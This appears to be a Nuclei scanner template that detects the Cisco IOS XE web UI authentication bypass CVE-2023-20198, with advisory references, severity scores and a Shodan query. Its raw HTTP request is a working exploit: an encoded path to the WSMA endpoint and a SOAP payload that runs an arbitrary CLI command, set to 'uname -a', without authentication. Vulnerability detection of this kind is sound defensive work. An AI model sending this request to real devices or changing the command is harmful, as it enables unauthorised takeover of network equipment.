64 lines
3.5 KiB
YAML
64 lines
3.5 KiB
YAML
id: CVE-2023-20198
|
|
|
|
info:
|
|
name: Cisco IOS XE - Authentication Bypass
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.
|
|
For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.
|
|
Cisco will provide updates on the status of this investigation and when a software patch is available.
|
|
impact: |
|
|
The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.
|
|
reference:
|
|
- https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
|
|
- https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/
|
|
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
|
|
- https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities
|
|
- https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2023-20198
|
|
epss-score: 0.92151
|
|
epss-percentile: 0.98755
|
|
cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: cisco
|
|
product: ios_xe
|
|
shodan-query: http.html_hash:1076109428
|
|
note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
|
|
tags: cve2023,cve,kev,cisco,rce,auth-bypass
|
|
variables:
|
|
cmd: uname -a
|
|
|
|
http:
|
|
- raw:
|
|
- |-
|
|
POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
<?xml version="1.0"?> <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <SOAP:Header> <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext"> <wsse:UsernameToken SOAP:mustUnderstand="false"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"> <execCLI xsd="false"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- XMLSchema
|
|
- execLog
|
|
- Cisco Systems
|
|
- <text>
|
|
- <received>
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- <text>\n(.*)\[
|
|
# digest: 490a0046304402204b6c30a90e6cf37aa7916fdb2aa34c90e17498b711af7c429834fbea028f05810220647873d5d55dd1e9af9ad701d9f44d1cd41765c1ab655050cf34f6bf140499e6:922c64590222798bb761d5b6d8e72950 |